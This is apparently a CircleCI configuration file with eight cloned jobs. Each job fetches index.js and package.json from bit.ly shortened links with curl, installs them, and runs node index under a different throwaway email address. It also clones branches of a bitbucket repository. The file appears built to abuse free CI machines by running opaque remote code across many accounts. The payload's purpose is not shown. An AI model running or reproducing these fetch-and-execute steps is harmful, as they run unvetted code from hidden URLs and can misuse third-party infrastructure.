version: 2.1

jobs:
 exemple_no_25:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch newgovernorcbn2014_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 57 -r 2 -e newgovernorcbn2014@vip.stu.office.gy
 exemple_no_26:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch gordch101ghj64fghfg_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e gordch101ghj64fghfg@vip.stu.office.gy
 exemple_no_27:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch petersimonsbacka_vip-stu-office-gy --single-branch lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 3 -e petersimonsbacka@vip.stu.office.gy
 exemple_no_28:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch dipjscdubairtfghefg_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e dipjscdubairtfghefg@vip.stu.office.gy
 exemple_no_29:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch dipjscuaefghdcvmnr_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 3 -e dipjscuaefghdcvmnr@vip.stu.office.gy
 exemple_no_30:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch qrtinfoyourtjnvcv_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 57 -r 2 -e qrtinfoyourtjnvcv@vip.stu.office.gy
 exemple_no_31:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch executive67867jalloh_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e executive67867jalloh@vip.stu.office.gy
 exemple_no_32:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch unsubemail5rr54bb5_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          script: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e unsubemail5rr54bb5@vip.stu.office.gy
      
      
workflows:
  exemple:
    jobs:
      - exemple_no_25
      - exemple_no_26
      - exemple_no_27
      - exemple_no_28
      - exemple_no_29
      - exemple_no_30
      - exemple_no_31
      - exemple_no_32
